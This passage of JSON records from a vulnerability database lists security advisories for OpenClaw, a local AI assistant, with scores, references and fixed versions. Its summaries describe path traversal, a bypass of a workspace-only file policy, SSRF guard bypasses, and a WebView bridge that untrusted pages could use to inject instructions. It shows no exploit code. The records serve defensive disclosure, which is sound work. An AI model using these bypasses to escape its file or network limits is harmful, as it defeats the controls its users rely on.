ring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"}],"url":"https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63551","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63551"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43567","reference_id":"CVE-2026-43567","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43567"},{"reference_url":"https://github.com/advisories/GHSA-jf25-7968-h2h5","reference_id":"GHSA-jf25-7968-h2h5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jf25-7968-h2h5"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter","reference_id":"openclaw-path-traversal-in-screen-record-outpath-parameter","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43567","GHSA-jf25-7968-h2h5"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mszk-dr24-xugw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90208?format=json","vulnerability_id":"VCID-mv8b-cryt-u3g8","summary":"OpenClaw: Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix)\n## Impact\n\nFeishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix).\n\nFeishu document uploads could read local files outside the workspace-only file policy when processing docx upload blocks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.3`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Rosayxy for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41911","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19277","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19229","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19273","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41911"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41911","reference_id":"CVE-2026-41911","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41911"},{"reference_url":"https://github.com/advisories/GHSA-5fc7-f62m-8983","reference_id":"GHSA-5fc7-f62m-8983","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5fc7-f62m-8983"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image","reference_id":"openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41911","GHSA-5fc7-f62m-8983"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mv8b-cryt-u3g8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89740?format=json","vulnerability_id":"VCID-mxu5-yjqs-nuap","summary":"OpenClaw: Existing-session browser interaction routes bypassed SSRF policy enforcement\n## Summary\n\nExisting-session browser interaction routes bypassed SSRF policy enforcement.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nExisting-session browser interaction routes could continue interacting with or navigating targets without applying the same SSRF navigation guard used by guarded browser routes.\n\n## Technical Details\n\nThe fix guards existing-session navigation and interaction routes with browser navigation policy checks.\n\n## Fix\n\nThe issue was fixed in #64370. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `daeb74920d5ad986cb600625180037e23221e93a`\n- PR: #64370\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43573","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09559","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43573"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a"},{"reference_url":"https://github.com/openclaw/openclaw/pull/64370","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/64370"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43573","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43573"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes"},{"reference_url":"https://github.com/advisories/GHSA-527m-976r-jf79","reference_id":"GHSA-527m-976r-jf79","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-527m-976r-jf79"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43573","GHSA-527m-976r-jf79"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mxu5-yjqs-nuap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91810?format=json","vulnerability_id":"VCID-nf6w-v1pc-mbe5","summary":"OpenClaw: Arbitrary code execution via unvalidated WebView JavascriptInterface\n## Summary\nAndroid Canvas WebView pages from untrusted origins could invoke the JavascriptInterface bridge and inject instructions into the app.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `8b02ef133275be96d8aac2283100016c8a7f32e5`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt now snapshots page origin and rejects untrusted bridge calls.\n- apps/android/app/src/main/java/ai/openclaw/app/node/CanvasActionTrust.kt centralizes trusted origin and path validation for the bridge.\n\nOpenClaw thanks @cyjhhh for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35643","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14446","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14485","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14482","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35643"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35643","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35643"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface"},{"reference_url":"https://github.com/advisories/GHSA